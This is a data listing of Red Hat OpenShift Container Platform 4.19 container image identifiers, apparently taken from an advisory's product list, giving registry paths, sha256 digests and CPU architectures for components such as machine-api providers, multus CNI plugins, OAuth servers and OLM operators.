"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
